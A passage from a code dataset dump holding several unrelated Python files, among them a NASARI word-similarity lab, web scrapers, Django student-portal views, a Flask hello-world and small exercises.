(abs(int(hashlib.sha512(surname.encode('utf-8')).hexdigest(), 16)) % 10)\n idx_intervallo = base_idx * 50+1\n return idx_intervallo\n\n#read the manually annotated file and return a dataframe\ndef readAnnotatedCouples():\n return pd.read_csv(SEMEVAL_ANNOTADED_FILE, sep='\t', names=['first','second','score'])\n\ndef read_nasari():\n nasari_df = pd.read_csv(NASARI_PATH, sep='$', names=['babel'])#fake separator\n nasari_df[['babel','terms']] = nasari_df[\"babel\"].str.split(\"\t\", 1, expand=True)\n nasari_df[['babel','lemma']] = nasari_df[\"babel\"].str.split(\"__\", 1, expand=True)\n nasari_df['lemma'] = nasari_df['lemma'].str.lower()\n return nasari_df\n\n#estrae i termini(embed) derivanti da ogni babelid dell'array topic\n#ritorna un array di array (uno per ogni babelid)\ndef getTermsFromBabelIds(topic, nasari_df):\n if len(topic)==0:\n return list()\n nasari_vect = []\n for single_topic in topic:\n nasari_terms = nasari_df.loc[nasari_df[nasari_df.columns[0]] == single_topic]['terms'].tolist()\n if len(nasari_terms) == 0:\n #nasari_vect.append([])\n continue\n else:\n nasari_vect.append(nasari_terms[0].split(\"\t\"))\n return nasari_vect\n\n#return a dict \ndef read_sense2synset():\n dict_to_ret = {}\n temp_synset_list = []\n last_term_seen = None\n first = True\n with open(SENSES2SYNSETS_PATH,encoding=\"utf-8\") as f:\n while True:\n line = f.readline().strip('\\n')\n if not line: \n break\n if line.startswith('#'):#è un termine\n if first:\n last_term_seen = line[1:]\n first = False\n else:\n dict_to_ret[last_term_seen] = temp_synset_list.copy()\n temp_synset_list.clear()\n last_term_seen = line[1:]\n else:#è un babelsynset\n temp_synset_list.append(line)\n\n return dict_to_ret\n\n#retrieve babel synsets terms related to columns first and second of annotated_couples dataframe\ndef getBabelTerms(annotated_couples):\n babel_term_synset_mapper = read_sense2synset()\n nasari_df = read_nasari()\n annotated_couples['first_syn_terms_embed'] = None\n annotated_couples['second_syn_terms_embed'] = None\n for i in annotated_couples.index:\n term1 = annotated_couples.iloc[i, :]['first']\n if not term1 in babel_term_synset_mapper:\n continue\n first_syns = babel_term_synset_mapper[term1]\n first_syn_terms = getTermsFromBabelIds(first_syns,nasari_df)\n\n if len(first_syn_terms) == 0:\n continue\n\n term2 = annotated_couples.iloc[i, :]['second']\n if not term2 in babel_term_synset_mapper:\n continue\n second_syns = babel_term_synset_mapper[term2]\n second_syn_terms = getTermsFromBabelIds(second_syns,nasari_df)\n\n if len(second_syn_terms) == 0:\n continue\n\n annotated_couples.at[i, 'first_syn_terms_embed'] = first_syn_terms\n annotated_couples.at[i, 'second_syn_terms_embed'] = second_syn_terms\n\n return annotated_couples,babel_term_synset_mapper\n\ndef cosine_similarity(x, y):\n x = [float(i) for i in x]\n y = [float(i) for i in y]\n return np.dot(x, y) / (np.sqrt(np.dot(x, x)) * np.sqrt(np.dot(y, y)))\n\n#calculate max cosine similarity between first_syn_terms_embed and second_syn_terms_embed\n#sens2syn_dict = a dict \ndef calculateNasariSimilarity(babelTerms,sens2syn_dict):\n babelTerms['nasari_cosin_similarity'] = None\n babelTerms['most_similar_syn1'] = None\n babelTerms['most_similar_syn2'] = None\n for i in babelTerms.index:\n first_syn_terms_embed = babelTerms.iloc[i, :]['first_syn_terms_embed']\n second_syn_terms_embed = babelTerms.iloc[i, :]['second_syn_terms_embed']\n maxSim = -100\n idx_max_synset1 = 0 #indice del babelsynset di first che massimizza la similarità\n idx_max_synset2 = 0 #indice del babelsynset di second che massimizza la similarità\n if (first_syn_terms_embed is None) or (second_syn_terms_embed is None):\n continue\n\n tmp_idx1 = 0\n tmp_idx2 = 0\n for term in first_syn_terms_embed:\n tmp_idx2 = 0\n for term2 in second_syn_terms_embed:\n sim = cosine_similarity(term,term2)\n if sim > maxSim:\n maxSim = sim\n idx_max_synset1 = tmp_idx1\n idx_max_synset2 = tmp_idx2\n tmp_idx2+=1\n tmp_idx1+=1\n\n babelTerms.at[i, 'nasari_cosin_similarity'] = maxSim\n babelTerms.at[i, 'most_similar_syn1'] = sens2syn_dict[babelTerms.iloc[i, :]['first']][idx_max_synset1]\n babelTerms.at[i, 'most_similar_syn2'] = sens2syn_dict[babelTerms.iloc[i, :]['second']][idx_max_synset2]\n\n return babelTerms\n\ndef printSpearmanPearson(list1, list2):\n\n #removing None similarity from list2\n res = [i for i in range(len(list2)) if list2[i] == None]\n print(res)\n for indexNone in sorted(res, reverse=True):\n del list1[indexNone]\n del list2[indexNone]\n\n print(\"pearson: \",pearsonr(list1,list2))\n print(\"spearman: \",spearmanr(list1,list2))\n\ndef consegna1():\n input_name = \"Coluccia\"\n\n values = []\n sx = get_range(input_name)\n values.append(sx)\n dx = sx+50-1\n intervallo = \"\" + str(sx) + \"-\" + str(dx)\n print('{:15}:\\tcoppie nell\\'intervallo {}'.format(input_name, intervallo))\n\n annotated_couples = readAnnotatedCouples()\n pd.to_numeric(annotated_couples['score'], errors='ignore')\n #normalizzo lo score annotato manualmente\n annotated_couples['score']=(annotated_couples['score']-annotated_couples['score'].min())/(annotated_couples['score'].max()-annotated_couples['score'].min())\n #print(annotated_couples)\n babelTerms,sens2syn_dict = getBabelTerms(annotated_couples)\n #print(babelTerms)\n nasari_sim = calculateNasariSimilarity(babelTerms,sens2syn_dict)\n print(nasari_sim)\n printSpearmanPearson(annotated_couples['score'].tolist(),nasari_sim['nasari_cosin_similarity'].tolist())\n #i coefficenti non evidenziano una forte correlazione --> secondo me perchè ci sono alcuni score molto distanti (soprattutto quelli che io ho messo a 0 o a 4)\n return nasari_sim #mi serve per la consegna2\n\n#-----------------------------------------------------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------------------------------------------------\n\ndef readNasariDfTerms():\n NASARI_DF = pd.read_csv(NASARI_PATH_TERMS, sep='$', names=['babel'])#fake separator\n NASARI_DF[['babel','terms']] = NASARI_DF[\"babel\"].str.split(\";\", 1, expand=True)\n NASARI_DF[['lemma','terms']] = NASARI_DF[\"terms\"].str.split(\";\", 1, expand=True)\n NASARI_DF['lemma'] = NASARI_DF['lemma'].str.lower()\n return NASARI_DF\n\ndef getTermsFromBabelIds_consegna2(single_topic,nasaridf):\n nasari_terms = nasaridf.loc[nasaridf[nasaridf.columns[0]] == single_topic]['terms'].tolist()\n \n nasari_terms_filtered = []\n for term in nasari_terms:\n if term is None:\n continue\n words = term.split(';')\n #words.pop(0)#remove first\n for word in words:\n if word == \"\":\n continue\n splitted = word.split(\"_\")\n if len(splitted) < 2:\n continue\n #print(splitted)\n nasari_terms_filtered.append(splitted[0])\n return nasari_terms_filtered\n\n#it returns a dataframe with this structure: 'term1','term2','babel1','babel2','terms_in_bs1', 'terms_in_bs2'\ndef readSynsetManuallyAnnotated():\n df = pd.read_csv(SEMEVAL_ANNOTADED_FILE_CONSEGNA2, sep='\t', names=['first','second','babel1','babel2'])\n df['terms_in_bs1'] = None\n df['terms_in_bs2'] = None\n\n nasari_df = readNasariDfTerms()\n\n for i in df.index:\n babel1 = df.iloc[i, :]['babel1']\n babel2 = df.iloc[i, :]['babel2']\n if babel1 is None:\n continue\n first_syn_terms = getTermsFromBabelIds_consegna2(babel1,nasari_df)\n\n if babel2 is None:\n continue\n second_syn_terms = getTermsFromBabelIds_consegna2(babel2,nasari_df)\n\n df.at[i, 'terms_in_bs1'] = first_syn_terms\n df.at[i, 'terms_in_bs2'] = second_syn_terms\n return df\n\ndef calculateBestSimilarityNasariSynset(annotated_df):\n #remove rows where at least one of the babel_terms list is empty\n filtered_df = annotated_df[(annotated_df.terms_in_bs1.map(len) > 0) & (annotated_df.terms_in_bs2.map(len) > 0)]\n filtered_df = filtered_df.reset_index()\n #print(filtered_df)\n #read nasari embed\n #nasari_df = read_nasari()\n\n #read sense2synset\n #babel_term_synset_mapper = read_sense2synset()\n\n filtered_df['first_syn_terms_embed'] = None\n filtered_df['second_syn_terms_embed'] = None\n\n #calculate cosine similarity for each row\n for i in filtered_df.index:\n #get embedded\n filtered_df,sens2syn_dict = getBabelTerms(filtered_df)\n nasari_sim_df = calculateNasariSimilarity(filtered_df,sens2syn_dict)\n #print(nasari_sim_df)\n #calculate accuracy over first babel\n most_similar_syn1 = nasari_sim_df['most_similar_syn1'].tolist()\n babel1 = nasari_sim_df['babel1'].tolist()\n correct = 0\n index = 0\n for nasari_babel in most_similar_syn1:\n my_babel = babel1[index]\n if nasari_babel == my_babel:\n correct+=1\n index+=1\n print(\"Accuracy over first babel: \",correct/len(most_similar_syn1))\n #calculate accuracy over second babel\n most_similar_syn2 = nasari_sim_df['most_similar_syn2'].tolist()\n babel2 = nasari_sim_df['babel2'].tolist()\n correct = 0\n index = 0\n for nasari_babel in most_similar_syn2:\n my_babel = babel2[index]\n if nasari_babel == my_babel:\n correct+=1\n index+=1\n print(\"Accuracy over second babel: \",correct/len(most_similar_syn2))\n #calculate accuracy over couple\n correct = 0\n index = 0\n for nasari_babel in most_similar_syn2:\n my_babel = babel2[index]\n my_babel1 = babel1[index]\n nasari_babel1 = most_similar_syn1[index]\n if nasari_babel == my_babel and nasari_babel1 == my_babel1:\n correct+=1\n index+=1\n print(\"Accuracy over couples: \",correct/len(most_similar_syn2))\n\ndef consegna2():\n annotated_df = readSynsetManuallyAnnotated()\n print(annotated_df)\n calculateBestSimilarityNasariSynset(annotated_df)\n\n\ndef main():\n consegna1_df = consegna1()\n print(\"################################################\\n##########################################\\n#########################\")\n consegna2()\n\nif __name__ == \"__main__\":\n main()","sub_path":"semval_lab.py","file_name":"semval_lab.py","file_ext":"py","file_size_in_byte":11777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"349881933","text":"import re\r\nimport urllib.request\r\nimport urllib.error\r\n\r\nif __name__ == \"__main__\":\r\n page = 2\r\n url = \"http://www.qiushibaike.com/hot/page/\" + str(page)\r\n user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'\r\n headers = {'User-Agent': user_agent}\r\n try:\r\n request = urllib.request.Request(url, headers=headers)\r\n response = urllib.request.urlopen(request)\r\n content = response.read().decode('utf-8')\r\n # re.S代表在匹配时为点任意匹配模式\r\n pattern = re.compile('(.*?).*?(.*?).*?', re.S)\r\n items = re.findall(pattern, content)\r\n for item in items:\r\n print(\"test\")\r\n print(item[0], item[1])\r\n except urllib.error.URLError as e:\r\n if hasattr(e, 'code'):\r\n print(e.code)","sub_path":"crawler_test/test_two.py","file_name":"test_two.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"321227563","text":"from django.shortcuts import render\n\nfrom reader.overallPosition import overallPosition\n\nfrom dashboard.models import (Student, Payment, Record, Level, ScoreRemark,\n GeneralSetting, Subject, Bill\n )\n\nimport json\nimport re\n\n# mysql connection used in dashboard.views\n# from dashboard.views import mydb, c\n\n\ndef login(request):\n if request.method=='GET':\n students = Student.objects.all()\n context = {\n 'students': students,\n }\n return render(request, 'student_login.html', context)\n\n elif request.method =='POST':\n student_id = request.POST['student_id']\n student_name = request.POST['student_name']\n try:\n student = Student.objects.get(student_id=student_id, name=student_name)\n\n except:\n students = Student.objects.all()\n context = {\n 'students': students,\n 'error_message': 'Student Id and Student Name did match'\n }\n return render(request, 'student_login.html', context)\n\n if student:\n return get_profile(request, student)\n\ndef get_profile(request, student):\n student_name = student.name\n student_class_id = student.level.id\n student_name_id = student.id\n\n students = Student.objects.filter(has_left=False, level_id=student_class_id)\n scores_and_names =[]\n for student in students:\n records = Record.objects.filter(\n student_name_id=student.id, class_of_record_id=student_class_id)\n\n totals = 0\n for record in records:\n if record.total:\n totals += record.total\n else:\n pass\n scores_and_names.append((str(student), totals))\n student_position = overallPosition(scores_and_names)[student_name]\n\n student = Student.objects.get(level_id=student_class_id, name=student_name)\n records = Record.objects.all()\n # order by the scores in descending order\n score_remarks = ScoreRemark.objects.all().order_by('-score')\n # initializing empty array for scores/marks\n marks = []\n for score in score_remarks:\n marks.append(score.score)\n\n # for each of the records, find the total, remark and grades\n for record in records:\n # initializing i (used for iterating over the scores and their remarks)\n i = 0\n total = record.class_score + record.exam_score\n # calculating the total for each term and subjet\n if not record.total:\n # SQL update\n # sql = \"UPDATE dashboard_record SET total = %s WHERE class_score = %s AND exam_score = %s\"\n # val = (total, record.class_score, record.exam_score)\n # c.execute(sql, val)\n # mydb.commit()\n\n\n # Django update\n Record.objects.filter(class_score=record.class_score, exam_score=record.exam_score, student_name=record.student_name).update(total = total)\n # record_to_update.total = total\n # record_to_update.save()\n\n\n remarkNotSet = True\n while remarkNotSet:\n # if the total for a particular subjet is greater than the first score in marks array,\n # get that mark and its remarks (excellent, very good etc)\n if total >= marks[i]:\n remarks = ScoreRemark.objects.filter(score=marks[i])\n for r in remarks:\n grade = r.grade\n remark = r.remark\n # if the remark(excellent etc) or the grade (A, B. C etc) is not set, set it by updating the database\n if not record.remark or not record.grade:\n\n # SQL UPDATE\n # sql = \"UPDATE dashboard_record SET grade = %s, remark = %s WHERE total = %s\"\n # val = (grade, remark, record.total)\n # c.execute(sql, val)\n # mydb.commit()\n\n # Django UPDATE\n Record.objects.filter(total=record.total).update(grade = grade, remark = remark)\n # record_to_update.grade = grade\n # record_to_update.remark = remark\n # record_to_update.save()\n\n # stop the looping over the marks since the grade is found, if not it will iterate over smaller grade\n # and return wrong grade and remark\n remarkNotSet = False\n\n # else if the total mark is less than the first mark in the sorted mark array\n # go to the next mark by increasing the index(i)\n elif i < len(marks)-1:\n i = i + 1\n # if done with all the element in the mark array,\n # set the remark and grade for that total to be the least, (F, Fail)\n else:\n i = len(marks)-1\n remarks = ScoreRemark.objects.filter(score=marks[i])\n # getting the remark and grade for the least\n for r in remarks:\n grade = r.grade\n remark = r.remark\n if not record.remark or not record.grade:\n # SQL UPDATE\n # sql = \"UPDATE dashboard_record SET grade = %s, remark = %s WHERE total = %s\"\n # val = (grade, remark, record.total)\n # c.execute(sql, val)\n # mydb.commit()\n\n # DJANGO UPDATE\n Record.objects.filter(total=record.total, student_name_id=record.student_name_id).update(\n grade = grade, remark = remark\n )\n # record_to_update.grade = grade\n # record_to_update.remark = remark\n # record_to_update.save()\n\n remarkNotSet = False\n\n # get new record after the updates to be sent to the template for rendering\n records = Record.objects.filter(\n student_name_id=student_name_id, class_of_record_id=student_class_id, term=1)\n\n # student_class = Record.objects.filter(student_name=student_name)\n\n # get the classes for selection to view report\n all_classes = Level.objects.all()\n\n # initializing dictionary and arrays for drawing chart\n\n # subject and their various terminal totals\n subjectAndTotals = {}\n # list of subjects\n subjects = []\n # classes of record available in the records table\n classes = []\n\n # chart data for a student\n chartData = Record.objects.filter(student_name_id=student_name_id).order_by('id')\n\n # for that data, get the records for the classes, subjects and their total scores\n for data in chartData:\n # classes.append(data.class_of_record)\n subjects.append(data.subject.name) if data.subject.name not in subjects else None\n\n for subject in subjects:\n values = 0\n subject_id = Subject.objects.get(name=subject).id\n\n # Sql update\n # query = \"SELECT total FROM dashboard_record WHERE subject_id = %s AND student_name_id = %s ORDER BY id\"\n # val = (subject_id, student_name_id)\n # c.execute(query, val)\n # totals = c.fetchall()\n\n # Django update\n totals = Record.objects.filter(subject_id=subject_id, student_name_id=student_name_id).order_by('id')\n totalsFortheSubject = []\n\n for total in totals:\n classes.append(\"Record \"+(values+1).__str__()) if \"Record \" + \\\n (values+1).__str__() not in classes else None\n values += 1\n # [(93,), (78,), (69,), (47,), (8,)]\n totalsFortheSubject.append(total.total)\n\n # converting to strings to use regular expression and get values without brackets and commas\n # '[(90,), (78,), (69,), (47,), (8,)]'\n totalsFortheSubject = totalsFortheSubject.__str__()\n\n # finding the values using regular expression\n totalsFortheSubject = re.findall('[0-9]+', totalsFortheSubject)\n\n # new array for the storing the int totals\n intTotalsFortheSubject = []\n for stringTotal in totalsFortheSubject:\n # getting the totals in integer format\n intTotalsFortheSubject.append(int(stringTotal))\n\n subjectAndTotals.update({subject: intTotalsFortheSubject})\n payments = Payment.objects.filter(student_name_id=student_name_id,\n approved=True, deleted=False).order_by('-id')\n\n totalPayment = Payment.objects.filter(student_name_id=student.id,\n approved=True, deleted=False)\n payment_amount = 0\n bill_amount = 0\n for payment in totalPayment:\n payment_amount += payment.amount\n\n totalBill = Bill.objects.filter(student_id=student.id)\n for bill in totalBill:\n for item in bill.billitem_set.all():\n bill_amount += item.amount\n\n\n context = {\n 'settings': GeneralSetting.objects.all()[0],\n 'student_position': student_position,\n 'payments': payments,\n 'amount_owing': bill_amount-payment_amount,\n 'all_classes': all_classes,\n 'student': student,\n 'subjects': json.dumps(subjects),\n 'subjectAndTotals': json.dumps(subjectAndTotals),\n 'classes': json.dumps(classes),\n }\n return render(request, 'student_profile.html', context)\n","sub_path":"portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"96968655","text":"# Minjoo Kim\n# ITP 115, Fall 2019\n# Assignment #3\n# 9/22/2019\n# minjook@usc.edu\n\n# Description:\n# This program calculates the largest, smallest, and average of given number.\n\n\ndef main():\n repeat = \"y\"\n\n while repeat == \"y\":\n number = 0\n large = -9999\n small = 9999\n total = 0\n count = 0\n\n print(\"Input an integer greater than or equal to 0 or -1 to quit:\")\n while number != -1:\n number = int(input())\n\n if number != -1:\n if number > large:\n large = number\n\n if number < small:\n small = number\n\n total += number\n count += 1\n\n average = (total + 1) / (count - 1)\n\n print(\"The largest number is \" + str(large))\n print(\"The smallest number is \" + str(small))\n print(\"The average number is \" + str(average))\n print(\"\\n\")\n repeat = input(\"Would you like to enter another set of numbers? (y/n): \")\n\n print(\"Goodbye!\")\n\n\nmain()\n","sub_path":"ITP 115 Assignments/ITP115_a3_Kim_Minjoo/ITP 115 Asn #3 - Largest, Smallest, and Average Number.py","file_name":"ITP 115 Asn #3 - Largest, Smallest, and Average Number.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"335660387","text":"# coding=utf-8\n\n'''\nAuthor: Amos.Li\nEmail: hpu120623@gmail.com\n\ndate: 2019/10/30 18:39\n'''\n\nfrom flask import Flask, jsonify\n\n# 创建flask的应用对象\n# __name__表示当前的模块名字\n# 模块名,flask以这个模块所在的目录为总目录,默认这个目录中的static为静态目录,templates为模板目录\napp = Flask(__name__,\n static_url_path='/python', # 访问静态资源的url前缀,默认值是static\n static_folder='static', # 静态文件的目录,默认就是static\n template_folder='templates', # 模板文件的目录,默认是templates\n )\n\n# 配置参数的使用方式\n# 1.使用配置文件\n# app.config.from_pyfile('config.cfg')\n\n# 2.使用对象配置参数(项目中使用)\nclass Config:\n DEBUG = True # 开启debug模式后,有修改会自动重启\n\n# app.config.from_object(Config)\n\n# 3.直接操作config的字典对象\n# app.config['DEBUG'] = True\n\n\n\n@app.route('/')\ndef index():\n \"\"\"定义视图函数\"\"\"\n # return jsonify({'result': 'hello flask'})\n a = 1 / 0\n return 'hello flask'\n\n\nif __name__ == '__main__':\n # 启动flask程序\n # app.run()\n app.run(host='192.168.1.197', port=8899)\n # app.run(host='0.0.0.0', port=8899)\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"51885371","text":"import sys\n\nread = sys.stdin.readline\n\ndef find(x) :\n if par[x] == x : return par[x]\n else :\n par[x] = find(par[x])\n return par[x]\n \ndef merge(x,y) :\n p_x = find(x)\n p_y = find(y)\n\n if p_x == p_y : return\n par[p_x] = p_y\n\nT = int(read())\nfor _ in range(T) :\n N,M = map(int,read().split())\n par = [i for i in range(N+1)]\n cnt = 0\n for _ in range(M) :\n a,b = map(int,read().split())\n if find(a) == find(b) : continue\n merge(a,b)\n cnt += 1\n print(cnt)\n","sub_path":"BOJ/30_최소신장트리/9372_상근이의여행.py","file_name":"9372_상근이의여행.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"504342243","text":"\nclass Utilities:\n \"\"\"This Class Serves as an helper class to Perform Grouping Checks\"\"\"\n\n @staticmethod\n def check_subscriptability(pod):\n \"\"\"Checks if an Application Grouping is Subscriptable\n\n :param str pod: Defines Pod objedct returned from getting deployment Pods.\n :return: str application group\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n\n try:\n application_group = pod.metadata.labels['applicationGroup']\n except TypeError:\n application_group = None\n return application_group\n","sub_path":"utils/basic_utilities.py","file_name":"basic_utilities.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"40384566","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 6 12:16:58 2019\n\n@author: mackenziemitchell\n\"\"\"\n\nimport requests\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom bs4 import BeautifulSoup\nimport pickle\nfrom RecFunctions import get_products_by_type,get_products_by_problem, categorical_columns, type_column\n\n#Functions Scrape Data and Get Info Df's For SkinStore\n\ncleansers=get_products_by_type('cleansers',14)\nexfoliators=get_products_by_type('exfoliators',6)\nremovers=get_products_by_type('makeup-removers',3)\ntoners=get_products_by_type('toners',6)\nmists=get_products_by_type('mists',3)\ntreatments=get_products_by_type('treatments',14)\nserums=get_products_by_type('serums',16)\nlotions=get_products_by_type('lotions',6)\nmoisturizers=get_products_by_type('moisturizers',23)\nbalms=get_products_by_type('balms',3)\noils=get_products_by_type('oils',5)\nmasks=get_products_by_type('masks',9)\npeels=get_products_by_type('peels',3)\nlips=get_products_by_type('lip-care',4)\neyes=get_products_by_type('eye-care',9)\nsupplements=get_products_by_type('supplements',1)\ntools=get_products_by_type('tools',5)\n\nacnedf,acne = get_products_by_problem('acne-blemishes',10)\nagedf,age = get_products_by_problem('anti-aging',30)\ndarkcdf,darkcircles = get_products_by_problem('dark-circles',5)\ndrydf,dryness = get_products_by_problem('dry-skin',19)\nncdf,norm= get_products_by_problem('normal-combination',17)\noilydf,oily=get_products_by_problem('oily-skin',17)\nsensitivedf,sensi=get_products_by_problem('sensitive-skin',17)\nreddf,redness=get_products_by_problem('redness-rosacea',17)\n\nbraa=[]\nratee=[]\npri=[]\nur=[]\nimgs=[]\nfor i,r,p,u in zip(acnedf.prodName,acnedf.rating,acnedf.price,acnedf.url):\n braa.append(i)\n ratee.append(r)\n pri.append(p)\n ur.append(u)\nfor i,r,p,u in zip(agedf.prodName,agedf.rating,agedf.price,agedf.url):\n braa.append(i)\n ratee.append(r)\n pri.append(p)\n ur.append(u)\nfor i,r,p,u in zip(darkcdf.prodName,darkcdf.rating,darkcdf.price,darkcdf.url):\n braa.append(i)\n ratee.append(r)\n pri.append(p)\n ur.append(u)\nfor i,r,p,u in zip(drydf.prodName,drydf.rating,drydf.price,drydf.url):\n braa.append(i)\n ratee.append(r)\n pri.append(p)\n ur.append(u)\nfor i,r,p,u in zip(ncdf.prodName,ncdf.rating,ncdf.price,ncdf.url):\n braa.append(i)\n ratee.append(r)\n pri.append(p)\n ur.append(u)\nfor i,r,p,u in zip(oilydf.prodName,oilydf.rating,oilydf.price,oilydf.url):\n braa.append(i)\n ratee.append(r)\n pri.append(p)\n ur.append(u)\nfor i,r,p,u in zip(sensitivedf.prodName,sensitivedf.rating,sensitivedf.price,sensitivedf.url):\n braa.append(i)\n ratee.append(r)\n pri.append(p)\n ur.append(u)\nfor i,r,p,u in zip(reddf.prodName,reddf.rating,reddf.price,reddf.url):\n braa.append(i)\n ratee.append(r)\n pri.append(p)\n ur.append(u)\ndatadict=[]\nfor i,r,p,u in zip(braa,ratee,pri,ur):\n datadict.append({'prodName':i,'rating':r,'price':p,'url':u})\nfinaldf=pd.DataFrame(datadict)\n\nfinaldf.rating=[float(i) for i in finaldf.rating]\nfinaldf.price=[float(i) for i in finaldf.price]\n\n#Finalize Full DF\ncategorical_columns('age',age,finaldf)\ncategorical_columns('darkcircles',darkcircles,finaldf)\ncategorical_columns('acne',acne,finaldf)\ncategorical_columns('dry',dryness,finaldf)\ncategorical_columns('redness',redness,finaldf)\ncategorical_columns('sensitive',sensi,finaldf)\ncategorical_columns('oily',oily,finaldf)\ncategorical_columns('normal',norm,finaldf)\ncategorical_columns('cleanser',cleansers,finaldf)\ncategorical_columns('exfoliator',exfoliators,finaldf)\ncategorical_columns('makeup-removers',removers,finaldf)\ncategorical_columns('toner',toners,finaldf)\ncategorical_columns('mist',mists,finaldf)\ncategorical_columns('treatment',treatments,finaldf)\ncategorical_columns('serum',serums,finaldf)\ncategorical_columns('lotion',lotions,finaldf)\ncategorical_columns('moisturizer',moisturizers,finaldf)\ncategorical_columns('balm',balms,finaldf)\ncategorical_columns('oil',oils,finaldf)\ncategorical_columns('mask',masks,finaldf)\ncategorical_columns('peel',peels,finaldf)\ncategorical_columns('lip',lips,finaldf)\ncategorical_columns('eye',eyes,finaldf)\ncategorical_columns('supplement',supplements,finaldf)\ncategorical_columns('tool',tools,finaldf)\n\n# with open('pickles/findf.pickle', 'wb') as f:\n# pickle.dump(finaldf, f, pickle.HIGHEST_PROTOCOL)\n\n#Get Review Info & Get Into DF\n\nratingdict=[]\nfor u in finaldf.url:\n response=requests.get('https://www.skinstore.com/the-ordinary-aha-30-bha-2-peeling-solution-30ml/{}.html'.format(u))\n soup=BeautifulSoup(response.content,'html.parser')\n titles=soup.findAll('h3',{'class':'productReviews_topReviewTitle'})\n ratings=soup.findAll('div',{'class':'productReviews_topReviewsRatingStarsContainer'})\n contents=soup.findAll('p',{'class':'productReviews_topReviewsExcerpt'})\n dates=soup.findAll('span',{'data-js-element':'createdDate'})\n users=soup.findAll('div',{'class':'productReviews_footerDateAndName'})\n brands=soup.find('div',{'data-information-component':'brand'})\n products=soup.find('h1',{'data-product-name':'title'})\n for t,r,c,d,i in zip(titles,ratings,contents,dates,users):\n ratingdict.append({'url':u,'brandName':brands.text.replace('\\n',''),'prodName':products.text,'title':t.text.replace('\\n',''),'rating':str(r).split('aria-label=')[1][1:2],'content':c.text.replace('\\n','').replace('\\r',''),'date':d.text,'user':i.text.replace('\\n','').split('by')[1].lower()})\nratingdf=pd.DataFrame(ratingdict)\nratingdf['rating']=[int(r) for r in ratingdf['rating']]\nratingdf.user=ratingdf.user.replace('','user')\nratingdf['brandName']=[r.replace('\\n','') for r in ratingdf['brandName']]\nratingdf.drop_duplicates(inplace=True)\nratingdf.content=[c.lower() for c in ratingdf.content]\nratingdf['date']=pd.to_datetime(ratingdf.date)\nfinaldf.drop(columns='rating',inplace=True)\nfinal=pd.merge(finaldf,ratingdf, on='url')\nfinal.drop(columns=['prodName_y'],inplace=True)\nfinal.rename(columns={'prodName_x':'prodName'},inplace=True)\n\n#Saving Final DF for Customized Rec Engine\n\nwith open('df1.pickle', 'wb') as f:\n pickle.dump(final, f, pickle.HIGHEST_PROTOCOL)\n","sub_path":"_GettingAllSkinStoreData.py","file_name":"_GettingAllSkinStoreData.py","file_ext":"py","file_size_in_byte":6167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"471847037","text":"import acm\nfrom DealPackageDevKit import DealPackageDefinition, List, Action, Text, Settings\nfrom inspect import cleandoc\n\n@Settings(GraphApplicable=False,\n SheetApplicable=False)\nclass ListControlInteraction(DealPackageDefinition):\n \"\"\"\n Double click on one of the elements in the list, and it will move to \n the other list. You can also select one element and then click on the \n arrows in the middle to move an elemnt.\n \"\"\"\n \n left = List( defaultValue=['Cat', 'Dog', 'Mouse'],\n label='Left',\n elementDomain='FString',\n onSelectionChanged='@UpdateSelectedElement',\n onDoubleClick='@MouseMoveTo',\n addNewItem =['First', 'Sorted'],\n sortIndexCallback='@AnimalSortingCallback',\n _moveToDestination='right')\n \n right = List( label='Right',\n elementDomain='FString',\n onSelectionChanged='@UpdateSelectedElement',\n onDoubleClick='@MouseMoveTo',\n addNewItem =['First', 'Sorted'],\n sortIndexCallback='@AnimalSortingCallback',\n _moveToDestination='left')\n \n moveToRight = Action( label='>',\n action='@ButtonMoveTo',\n _moveToDestination='right',\n enabled='@IsLeftElementSelected',\n sizeToFit=True)\n \n moveToLeft = Action( label='<',\n action='@ButtonMoveTo',\n _moveToDestination='left',\n enabled='@IsRightElementSelected',\n sizeToFit=True)\n \n doc = Text( defaultValue=cleandoc(__doc__),\n editable=False,\n height=80) \n\n # ####################### #\n # Interface Overrides #\n # ####################### #\n \n def OnInit(self):\n self._selected = {}\n \n def CustomPanes(self):\n return self.GetCustomPanesFromExtValue('CustomPanes_ListControlInteraction_DPE')\n \n def IsValid(self, exceptionAccumulator, aspect):\n exceptionAccumulator('This example is used to demonstrate lists and can not be saved.')\n\n # ####################### #\n # Attribute Callbacks #\n # ####################### #\n \n def MouseMoveTo(self, attrName, selectedElement):\n self.UpdateSelectedElement(attrName, selectedElement)\n self.ButtonMoveTo(attrName)\n \n def ButtonMoveTo(self, attrName):\n destination = self.GetAttributeMetaData(attrName, '_moveToDestination')()\n self._MoveSelectedElementTo( destination )\n \n def UpdateSelectedElement(self, attrName, selectedElement):\n self._selected[attrName] = selectedElement\n \n def IsRightElementSelected(self, attrName):\n return self._GetSelectedElementInList('right') != None\n \n def IsLeftElementSelected(self, attrName):\n return self._GetSelectedElementInList('left') != None\n\n def AnimalSortingCallback(self, attrName, columnNbr, value1, formatter, obj):\n # Sort by reverse string\n return value1[::-1]\n \n # ####################### 